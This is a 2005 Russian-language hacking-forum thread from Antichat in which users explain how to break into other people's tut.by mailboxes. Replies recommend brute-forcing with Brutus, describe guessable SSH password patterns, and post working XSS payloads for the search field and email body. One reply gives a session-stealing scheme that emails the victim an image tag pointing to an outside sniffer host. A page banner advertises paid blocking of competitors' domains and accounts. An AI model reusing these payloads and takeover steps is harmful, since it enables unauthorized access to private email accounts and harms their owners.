УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
tut.by

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

tut.by

12.10.2005, 20:15

Tommi

Новичок

Регистрация: 10.10.2005

Сообщений: 2

Провел на форуме:
4067

Репутация: 0

tut.by

Народ кто-нибудь знает как ломать ящики на tut.by?

12.10.2005, 21:21

Nexwill

Участник форума

Регистрация: 02.08.2005

Сообщений: 172

Провел на форуме:
2049838

Репутация: 100

Отправить сообщение для Nexwill с помощью ICQ

Brutus в руки и погнал......

12.10.2005, 22:11

Tommi

Новичок

Регистрация: 10.10.2005

Сообщений: 2

Провел на форуме:
4067

Репутация: 0

Брутус - это и ёжику понятно. А как-нить поумнее можно?

13.10.2005, 22:04

ais+

Новичок

Регистрация: 17.08.2005

Сообщений: 16

Провел на форуме:
82828

Репутация: 0

Отправить сообщение для ais+ с помощью ICQ

Все сайты, которые они хостят, лежат вмесе с их мыльницей на одном серве.
ЗЫ для каждого хостящегося есть ssh. Пассы на ssh обычно:
логин - низвание сайта без домена, а пароль комбинация 9 чисел и букв.
Там дохрена сайтов с ipb и phpbb помойму до сих пор валяется.

Хм..

16.10.2005, 09:15

Dronga

ВАША реклама ТУТ!!

Регистрация: 01.07.2005

Сообщений: 647

Провел на форуме:
3478464

Репутация: 714

Отправить сообщение для Dronga с помощью ICQ

Хм..

Умнее... Ищи xss. Есть пасивная в поле поискового запроса, прямо на главной, там в теге title ничего не фильтруется. xss выглядит так:

Код:

</title><script>alert('Antichat (c)!')</script>

Может пригодиться..

__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 16.10.2005 в 09:19..

Взлом tut.by

16.10.2005, 10:03

Dronga

ВАША реклама ТУТ!!

Регистрация: 01.07.2005

Сообщений: 647

Провел на форуме:
3478464

Репутация: 714

Взлом tut.by

Ну чтож.. На редкость дырявый портал. За 20 минут было обнаружено несколько активных xss в теле письма. Вот пример:

Код:

<style type="text/css">@import url(javascript:alert('Antichat have it!'));</style>

Работает в IE. Поскольку для аутентификации куки не используются, то взлом упрощается до нельзя. Всего навсего требуется сессия. Отправляешь жертве такую тему:

Код:

Привет, как дела?
<img src="http://antichat.ru/cgi-bin/s.jpg">

и подписываешься на снифер. ВСЁ! Ящик твой.

Палева - 0, эффективность - 100%, жаль пароля не будет) Очень рекомендую использовать при этом программу XSS Tester от LittleLamer. Можно скачать с этой странички.

Если прибавишь мне репутацию, то я не обижусь.

__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 16.10.2005 в 13:45..

17.10.2005, 02:01

limbonic

Познающий

Регистрация: 05.12.2003

Сообщений: 54

Провел на форуме:
173295

Репутация: 0

Мда ....осталось только чтобы жертва почту првоеряла через инет =))

18.10.2005, 13:43

Dronga

ВАША реклама ТУТ!!

Регистрация: 01.07.2005

Сообщений: 647

Провел на форуме:
3478464

Репутация: 714

Только осталось... Так говоришь, как будто это делают единицы) По мне так, пускай лучше меня взламает неизвестный мне тип, чем сосед по локалке, который отснифал пасс по POP3... Портал вообще безбашенный в плане безопасности.. Куда смотрят...

__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 18.10.2005 в 13:46..